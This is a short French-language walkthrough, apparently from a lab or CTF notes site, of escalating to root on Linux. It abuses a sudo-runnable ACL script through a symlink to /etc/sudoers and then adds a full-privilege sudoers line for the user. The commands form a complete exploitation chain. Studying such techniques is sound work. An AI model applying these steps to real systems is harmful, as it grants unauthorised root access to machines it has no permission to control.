Sudo ACL / Symbolic Link - Linux Privilege Escalation

En exécutant la commande sudo -l, on découvre que nous avons la possibilité d'exécuter un script en tant que root.

sudo -l

Ce script Bash modifie les permissions d'accès d'un utilisateur sur un fichier spécifique en utilisant les ACL, après avoir vérifié la validité du chemin et que la cible est bien un fichier.

Finalement, accordons à l'utilisateur mtz les droits de lecture et écriture sur le fichier

sudo /opt/acl.sh mtz rw /etc/sudoers

Une erreur se produit car le fichier doit être situé dans notre répertoire /home/mtz

Pour résoudre une solution de contournement pourrait être de créer un lien symbolique d'un fichier système vers le répertoire /home/mtz/ et d'exécuter le script sur ce lien.

ln -s /etc/sudoers /home/mtz/sudoers_link
sudo /opt/acl.sh mtz rw /home/mtz/sudoers_link

Nous devons modifier le fichier "sudoers_link", ce qui mettra à jour le fichier sudoers, pour donner tous les droits à l'utilisateur mtz.

mtz ALL=(ALL:ALL) ALL

Mis à jour il y a 9 mois

Ce contenu vous a-t-il été utile ?